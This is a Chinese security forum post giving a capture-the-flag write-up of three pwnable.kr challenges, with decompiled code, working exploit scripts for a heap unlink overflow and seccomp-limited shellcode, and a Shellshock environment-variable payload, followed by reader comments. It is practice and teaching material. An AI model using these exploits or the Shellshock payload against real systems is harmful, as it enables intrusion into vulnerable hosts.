首页
论坛
课程
招聘
[原创] pwnable.kr -- rest-of-toddler
2018-1-9 17:18 2104

[原创] pwnable.kr -- rest-of-toddler

aqs 活跃值
5
2018-1-9 17:18
2104

终于结束了考试,刷题模式再次开启T^T

先来一道简单的题目热下身

toddler unlink

description

Daddy! how can I exploit unlink corruption?

ssh unlink@pwnable.kr -p2222 (pw: guest)

what it do

❯ ./unlink 
here is stack address leak: 0xffc28534
here is heap address leak: 0x82a0410
now that you have leaks, get shell!
a

Here we have a stack address, a heap address and an input
now the code

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int *v3; // ST04_4
  char *heap1; // [esp-14h] [ebp-14h]
  _DWORD *heap3; // [esp-10h] [ebp-10h]
  _DWORD *heap2; // [esp-Ch] [ebp-Ch]

  malloc(0x400u);
  heap1 = (char *)malloc(0x10u);
  heap2 = malloc(0x10u);
  heap3 = malloc(0x10u);
  *(_DWORD *)heap1 = heap2;
  heap2[1] = heap1;
  *heap2 = heap3;
  heap3[1] = heap2;
  printf("here is stack address leak: %p\n", &heap1);
  printf("here is heap address leak: %p\n", heap1);
  puts("now that you have leaks, get shell!");
  gets(heap1 + 8);
  unlink((int)heap2, v3);
  return 0;
}
_DWORD *__cdecl unlink(int a1, int *a2)
{
  _DWORD *v2; // ST10_4
  int v3; // ST0C_4
  _DWORD *result; // eax

  v2 = (_DWORD *)a2[1];
  v3 = *a2;
  *(_DWORD *)(v3 + 4) = v2;
  result = v2;
  *v2 = v3;
  return result;
}

嘛,这可以算做一个 unlink 的入门练习吧,模仿unlink 的操作
you have three chunk, heap1, which you can overwrite. Heap2, av chunk which will be unlink.
So, 我们的目标就是通过改写 heap2 的 fd以及 bk 来控制执行流

0x804b408:      0x00000000      0x00000019      0x0804b428      0x00000000
0x804b418:      0x00000000      0x00000000      0x00000000      0x00000019
0x804b428:      0x0804b440      0x0804b410      0x00000000      0x00000000
0x804b438:      0x00000000      0x00000019      0x00000000      0x0804b428
0x804b448:      0x00000000      0x00000000      0x00000000      0x00000409

heap1 -- heap2 -- heap3

shell is given

 

 

所以所需要做的就是控制执行流跳到 shell 函数即可

 

pwn step is as below

write(shell_addr*2) in heap1
write( p32(0)+p32(0x19)) overflow heap2 to pervent crash
write(stack_leak+0x10-0x4) to heap2's fd # stack_leak+0x10 is the ebp
write(heap_leak+8+4) to heap2's bk # heap_leak is the addr of heap1

after unlink
main 函数的 esp 会被劫持到 heap_leak+8+4 的地方,也就是我们写入shell_addr 的地方
and after ret operate, you will getshell

exp

from pwn import *

p=process("./unlink")

def pwn():
    p.recvuntil("leak: ")
    stack_leak=p.recvline().strip()
    stack_leak=int(stack_leak,16)
    print p.recvuntil("leak: ")
    heap_leak=p.recvline().strip()
    heap_leak=int(heap_leak,16)
    p.info("heap_leak:stack_leak  "+hex(heap_leak)+":"+hex(stack_leak))
    shell_addr=0x80484EB
    payload=p32(shell_addr)*2
    payload+=p32(0)+p32(0x19)
    payload+=p32(stack_leak+0x10-0x4)
    payload+=p32(heap_leak+8+4)
    p.sendline(payload)
    p.interactive()

pwn()

toddler asm

decription

❯ ./asm                                                                                                                                         ⏎
Welcome to shellcoding practice challenge.
In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
Try to make shellcode that spits flag using open()/read()/write() systemcalls only.
If this does not challenge you. you should play 'asg' challenge :)
give me your x64 shellcode:

this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong

It seems that we need to send a x64 shellcode to read the flag file with the seccomp sandbox

❯ seccomp-tools dump ./asm                                                                                                                      ⏎
Welcome to shellcoding practice challenge.
In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
Try to make shellcode that spits flag using open()/read()/write() systemcalls only.
If this does not challenge you. you should play 'asg' challenge :)
give me your x64 shellcode: a
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x08 0xc000003e  if (A != ARCH_X86_64) goto 0010
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x06 0x00 0x40000000  if (A >= 0x40000000) goto 0010
 0004: 0x15 0x04 0x00 0x00000000  if (A == read) goto 0009
 0005: 0x15 0x03 0x00 0x00000001  if (A == write) goto 0009
 0006: 0x15 0x02 0x00 0x00000002  if (A == open) goto 0009
 0007: 0x15 0x01 0x00 0x0000003c  if (A == exit) goto 0009
 0008: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0010
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0010: 0x06 0x00 0x00 0x00000000  return KILL

We can only use read, write, and open syscall

 

and the code

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char *s; // ST18_8
  size_t v4; // rdx

  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  puts("Welcome to shellcoding practice challenge.");
  puts("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.");
  puts("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.");
  puts("If this does not challenge you. you should play 'asg' challenge :)");
  s = (char *)mmap((void *)0x41414000, 0x1000uLL, 7, 50, 0, 0LL);
  memset(s, 144, 0x1000uLL);
  v4 = strlen(stub);
  memcpy(s, stub, v4);
  printf("give me your x64 shellcode: ", stub, argv);
  read(0, s + 46, 0x3E8uLL);
  alarm(0xAu);
  chroot("/home/asm_pwn");
  sandbox();
  ((void (__fastcall *)(const char *))s)("/home/asm_pwn");
  return 0;
}

Okay, it is clear now.
You know the file name in /home/asm, the real file is in /home/asm_pwn which need to use the binary to reach.

 

Now, the exp using pwntools

#!/usr/bin/env python
#coding:utf-8
from pwn import *
import time
con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('localhost', 9026)

context.arch='amd64'


shellcode = ''
shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')

shellcode += shellcraft.open('rsp', 0, 0)#open the pushed filename
shellcode += shellcraft.read('rax', 'rsp', 100)# rax is the fd return, and then read the flag to the rsp -> stack
shellcode += shellcraft.write(1, 'rsp', 100)# then we write it and now we can see that


print p.recvuntil("shellcode:")

p.send(asm(shellcode))

print p.recv()
print p.recv()

toddler shellsock

description

Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)


ssh shellshock@pwnable.kr -p2222 (pw:guest)

Well, you need to know the shellshock Vulnerability first.

 

http://www.freebuf.com/articles/system/45390.html
https://baike.baidu.com/item/Shellshock/15862860?fr=aladdin
You have two file

bash  shellshock

shellshock

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __gid_t v3; // er12
  __gid_t v4; // ebx
  __gid_t v5; // eax
  __gid_t v6; // er12
  __gid_t v7; // ebx
  __gid_t v8; // eax

  v3 = getegid();
  v4 = getegid();
  v5 = getegid();
  setresuid(v5, v4, v3);
  v6 = getegid();
  v7 = getegid();
  v8 = getegid();
  setresgid(v8, v7, v6);
  system("/home/shellshock/bash -c 'echo shock_me'");
  return 0;
}

shellshock 会调用 bash binary
嘛,总之就是一个命令执行

exp

env x='() { :;}; /bin/cat flag' ./shellshock

memcpy


《0day安全 软件漏洞分析技术(第二版)》第三次再版印刷预售开始!

收藏
点赞0
打赏
分享
最新回复 (4)
雪    币: 38
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
ooOOOoomxw 活跃值 2018-1-9 18:23
2
0
支持一下。不过wargame这些最好不要发wp吧。  那个站不是也说了么    23333
雪    币: 2732
活跃值: 活跃值 (10)
能力值: ( LV15,RANK:828 )
在线值:
发帖
回帖
粉丝
aqs 活跃值 5 2018-1-9 20:38
3
0
oh,  有这回事??
雪    币: 2732
活跃值: 活跃值 (10)
能力值: ( LV15,RANK:828 )
在线值:
发帖
回帖
粉丝
aqs 活跃值 5 2018-1-9 20:44
4
0
Okay,  I  will  only  do  local  records.
雪    币: 60
活跃值: 活跃值 (10)
能力值: ( LV3,RANK:35 )
在线值:
发帖
回帖
粉丝
返無歸一 活跃值 2018-1-10 15:03
5
0
pwnable.kr有说不能放writeup吗?我只记得pwnable.tw说不要放高分的writeup而已
游客
登录 | 注册 方可回帖
返回